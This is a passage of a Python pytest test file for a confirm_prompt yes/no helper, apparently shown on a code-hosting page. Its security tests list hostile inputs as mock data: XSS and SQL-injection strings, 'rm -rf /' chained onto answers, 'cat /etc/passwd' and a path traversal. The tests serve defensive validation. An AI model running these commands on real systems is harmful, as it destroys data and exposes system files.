result = confirm_prompt("Continue?", default_yes=False)
|
||||
assert result is True, f"Failed for response: {response}"
|
||||
|
||||
def test_confirm_prompt_various_no_responses(self):
|
||||
"""Test confirm prompt with various no responses."""
|
||||
no_responses = ["n", "N", "no", "NO", "No", "nO"]
|
||||
|
||||
for response in no_responses:
|
||||
with patch("builtins.input", return_value=response):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is False, f"Failed for response: {response}"
|
||||
|
||||
def test_confirm_prompt_invalid_responses(self):
|
||||
"""Test confirm prompt with invalid responses."""
|
||||
invalid_responses = ["maybe", "perhaps", "ok", "sure", "whatever", "123", ""]
|
||||
|
||||
for response in invalid_responses:
|
||||
with patch("builtins.input", return_value=response):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
expected = response == "" # Empty string should return default
|
||||
assert result == expected, f"Failed for response: {response}"
|
||||
|
||||
def test_confirm_prompt_question_display(self):
|
||||
"""Test that the question is displayed correctly."""
|
||||
with patch("builtins.input", return_value="y") as mock_input:
|
||||
confirm_prompt("Test question?", default_yes=True)
|
||||
mock_input.assert_called_once_with("Test question? [Y/n] ")
|
||||
|
||||
def test_confirm_prompt_question_display_default_no(self):
|
||||
"""Test that the question is displayed correctly with default no."""
|
||||
with patch("builtins.input", return_value="y") as mock_input:
|
||||
confirm_prompt("Test question?", default_yes=False)
|
||||
mock_input.assert_called_once_with("Test question? [y/N] ")
|
||||
|
||||
def test_confirm_prompt_case_insensitive(self):
|
||||
"""Test that confirm prompt is case insensitive."""
|
||||
mixed_case_responses = ["YeS", "yEs", "YeS", "No", "nO", "NO"]
|
||||
expected_results = [True, True, True, False, False, False]
|
||||
|
||||
for response, expected in zip(mixed_case_responses, expected_results):
|
||||
with patch("builtins.input", return_value=response):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result == expected, f"Failed for response: {response}"
|
||||
|
||||
def test_confirm_prompt_empty_string_default_yes(self):
|
||||
"""Test confirm prompt with empty string and default yes."""
|
||||
with patch("builtins.input", return_value=""):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_empty_string_default_no(self):
|
||||
"""Test confirm prompt with empty string and default no."""
|
||||
with patch("builtins.input", return_value=""):
|
||||
result = confirm_prompt("Continue?", default_yes=False)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_whitespace_only_default_yes(self):
|
||||
"""Test confirm prompt with whitespace only and default yes."""
|
||||
with patch("builtins.input", return_value=" "):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_whitespace_only_default_no(self):
|
||||
"""Test confirm prompt with whitespace only and default no."""
|
||||
with patch("builtins.input", return_value=" "):
|
||||
result = confirm_prompt("Continue?", default_yes=False)
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_special_characters(self):
|
||||
"""Test confirm prompt with special characters in question."""
|
||||
special_question = "Delete file 'test@#$%^&*()'?"
|
||||
with patch("builtins.input", return_value="y") as mock_input:
|
||||
confirm_prompt(special_question, default_yes=True)
|
||||
mock_input.assert_called_once_with(f"{special_question} [Y/n] ")
|
||||
|
||||
def test_confirm_prompt_unicode_question(self):
|
||||
"""Test confirm prompt with unicode characters in question."""
|
||||
unicode_question = "Delete file 'vídeo.mp4'?"
|
||||
with patch("builtins.input", return_value="y") as mock_input:
|
||||
confirm_prompt(unicode_question, default_yes=True)
|
||||
mock_input.assert_called_once_with(f"{unicode_question} [Y/n] ")
|
||||
|
||||
def test_confirm_prompt_long_question(self):
|
||||
"""Test confirm prompt with a very long question."""
|
||||
long_question = "This is a very long question that might wrap to multiple lines and contain a lot of text to test how the prompt handles long input strings"
|
||||
with patch("builtins.input", return_value="y") as mock_input:
|
||||
confirm_prompt(long_question, default_yes=True)
|
||||
mock_input.assert_called_once_with(f"{long_question} [Y/n] ")
|
||||
|
||||
def test_confirm_prompt_multiple_calls(self):
|
||||
"""Test multiple confirm prompt calls."""
|
||||
with patch("builtins.input", side_effect=["y", "n", ""]):
|
||||
result1 = confirm_prompt("First question?", default_yes=True)
|
||||
result2 = confirm_prompt("Second question?", default_yes=True)
|
||||
result3 = confirm_prompt("Third question?", default_yes=True)
|
||||
|
||||
assert result1 is True
|
||||
assert result2 is False
|
||||
assert result3 is True
|
||||
|
||||
def test_confirm_prompt_error_handling(self):
|
||||
"""Test confirm prompt error handling."""
|
||||
# Test with KeyboardInterrupt
|
||||
with patch("builtins.input", side_effect=KeyboardInterrupt):
|
||||
with pytest.raises(KeyboardInterrupt):
|
||||
confirm_prompt("Continue?", default_yes=True)
|
||||
|
||||
def test_confirm_prompt_value_error(self):
|
||||
"""Test confirm prompt with ValueError."""
|
||||
with patch("builtins.input", side_effect=ValueError("Invalid input")):
|
||||
with pytest.raises(ValueError):
|
||||
confirm_prompt("Continue?", default_yes=True)
|
||||
|
||||
def test_confirm_prompt_os_error(self):
|
||||
"""Test confirm prompt with OSError."""
|
||||
with patch("builtins.input", side_effect=OSError("Input error")):
|
||||
with pytest.raises(OSError):
|
||||
confirm_prompt("Continue?", default_yes=True)
|
||||
|
||||
def test_confirm_prompt_integration_scenario(self):
|
||||
"""Test confirm prompt in a realistic integration scenario."""
|
||||
# Simulate a user workflow with multiple confirmations
|
||||
with patch("builtins.input", side_effect=["y", "n", "yes", "no", ""]):
|
||||
# User confirms first action
|
||||
result1 = confirm_prompt("Convert video to MP4?", default_yes=True)
|
||||
assert result1 is True
|
||||
|
||||
# User declines second action
|
||||
result2 = confirm_prompt("Apply compression?", default_yes=True)
|
||||
assert result2 is False
|
||||
|
||||
# User confirms third action
|
||||
result3 = confirm_prompt("Add watermark?", default_yes=False)
|
||||
assert result3 is True
|
||||
|
||||
# User declines fourth action
|
||||
result4 = confirm_prompt("Overwrite existing file?", default_yes=False)
|
||||
assert result4 is False
|
||||
|
||||
# User accepts default for fifth action
|
||||
result5 = confirm_prompt("Proceed with conversion?", default_yes=True)
|
||||
assert result5 is True
|
||||
|
||||
def test_confirm_prompt_assume_yes_scenario(self):
|
||||
"""Test confirm prompt in non-interactive scenario."""
|
||||
# Simulate automated/batch processing
|
||||
with patch("builtins.input") as mock_input:
|
||||
result1 = confirm_prompt("Convert video 1?", assume_yes=True)
|
||||
result2 = confirm_prompt("Convert video 2?", assume_yes=True)
|
||||
result3 = confirm_prompt("Convert video 3?", assume_yes=True)
|
||||
|
||||
assert result1 is True
|
||||
assert result2 is True
|
||||
assert result3 is True
|
||||
mock_input.assert_not_called()
|
||||
|
||||
def test_confirm_prompt_default_behavior_scenario(self):
|
||||
"""Test confirm prompt default behavior in different scenarios."""
|
||||
# Test safe operations (default yes)
|
||||
with patch("builtins.input", return_value=""):
|
||||
result1 = confirm_prompt("Continue with safe operation?", default_yes=True)
|
||||
assert result1 is True
|
||||
|
||||
# Test dangerous operations (default no)
|
||||
with patch("builtins.input", return_value=""):
|
||||
result2 = confirm_prompt("Delete important file?", default_yes=False)
|
||||
assert result2 is False
|
||||
|
||||
def test_confirm_prompt_edge_cases(self):
|
||||
"""Test confirm prompt with edge case inputs."""
|
||||
edge_cases = [
|
||||
("y", True),
|
||||
("Y", True),
|
||||
("yes", True),
|
||||
("YES", True),
|
||||
("n", False),
|
||||
("N", False),
|
||||
("no", False),
|
||||
("NO", False),
|
||||
("", True), # Default yes
|
||||
(" ", True), # Whitespace only, default yes
|
||||
("maybe", False), # Invalid response
|
||||
("ok", False), # Invalid response
|
||||
]
|
||||
|
||||
for response, expected in edge_cases:
|
||||
with patch("builtins.input", return_value=response):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
assert result == expected, f"Failed for response: '{response}'"
|
||||
|
||||
def test_confirm_prompt_performance(self):
|
||||
"""Test confirm prompt performance with many calls."""
|
||||
import time
|
||||
|
||||
start_time = time.time()
|
||||
with patch("builtins.input", return_value="y"):
|
||||
for _ in range(1000):
|
||||
result = confirm_prompt("Test question?", default_yes=True)
|
||||
assert result is True
|
||||
end_time = time.time()
|
||||
|
||||
# Should complete in reasonable time
|
||||
assert end_time - start_time < 5.0
|
||||
|
||||
def test_confirm_prompt_memory_usage(self):
|
||||
"""Test confirm prompt memory usage."""
|
||||
# Test that multiple calls don't cause memory leaks
|
||||
with patch("builtins.input", return_value="y"):
|
||||
for i in range(1000):
|
||||
result = confirm_prompt(f"Question {i}?", default_yes=True)
|
||||
assert result is True
|
||||
|
||||
def test_confirm_prompt_thread_safety(self):
|
||||
"""Test confirm prompt thread safety."""
|
||||
import threading
|
||||
import time
|
||||
|
||||
results = []
|
||||
|
||||
def confirm_worker():
|
||||
with patch("builtins.input", return_value="y"):
|
||||
result = confirm_prompt("Thread test?", default_yes=True)
|
||||
results.append(result)
|
||||
|
||||
threads = []
|
||||
for _ in range(10):
|
||||
thread = threading.Thread(target=confirm_worker)
|
||||
threads.append(thread)
|
||||
thread.start()
|
||||
|
||||
for thread in threads:
|
||||
thread.join()
|
||||
|
||||
assert len(results) == 10
|
||||
assert all(result is True for result in results)
|
||||
|
||||
|
||||
class TestUserPromptsSecurity:
|
||||
"""Test security aspects of user prompts."""
|
||||
|
||||
def test_confirm_prompt_input_sanitization(self):
|
||||
"""Test that confirm prompt properly sanitizes input."""
|
||||
# Test with potentially dangerous input
|
||||
dangerous_inputs = [
|
||||
"<script>alert('xss')</script>",
|
||||
"'; DROP TABLE users; --",
|
||||
"convert video; rm -rf /",
|
||||
"../../../etc/passwd",
|
||||
]
|
||||
|
||||
for dangerous_input in dangerous_inputs:
|
||||
with patch("builtins.input", return_value=dangerous_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should not crash and should return False for non-yes responses
|
||||
assert isinstance(result, bool)
|
||||
|
||||
def test_confirm_prompt_injection_prevention(self):
|
||||
"""Test that confirm prompt prevents injection attacks."""
|
||||
# Test with various injection attempts
|
||||
injection_attempts = [
|
||||
"y\nrm -rf /",
|
||||
"yes\ncat /etc/passwd",
|
||||
"y; rm -rf /",
|
||||
"yes && rm -rf /",
|
||||
]
|
||||
|
||||
for attempt in injection_attempts:
|
||||
with patch("builtins.input", return_value=attempt):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# The function only accepts exact 'y' or 'yes' after stripping
|
||||
# These inputs contain additional characters, so they should return False
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_overflow_prevention(self):
|
||||
"""Test that confirm prompt handles very long input."""
|
||||
# Test with a single 'y' character (which should work)
|
||||
single_y = "y"
|
||||
with patch("builtins.input", return_value=single_y):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle input gracefully and return True for 'y'
|
||||
assert result is True
|
||||
|
||||
# Test with a very long string that doesn't match 'y' or 'yes'
|
||||
very_long_input = "y" * 10000
|
||||
with patch("builtins.input", return_value=very_long_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle long input gracefully and return False since it's not 'y' or 'yes'
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_null_byte_handling(self):
|
||||
"""Test that confirm prompt handles null bytes properly."""
|
||||
null_input = "y\x00n"
|
||||
with patch("builtins.input", return_value=null_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle gracefully and return False since it's not exactly 'y' or 'yes'
|
||||
assert result is False
|
||||
|
||||
def test_confirm_prompt_control_character_handling(self):
|
||||
"""Test that confirm prompt handles control characters."""
|
||||
control_input = "y\x01\x02\x03n"
|
||||
with patch("builtins.input", return_value=control_input):
|
||||
result = confirm_prompt("Continue?", default_yes=True)
|
||||
# Should handle gracefully and return False since it's not exactly 'y' or 'yes'
|
||||
assert result is False
|
||||
Reference in New Issue
Block a user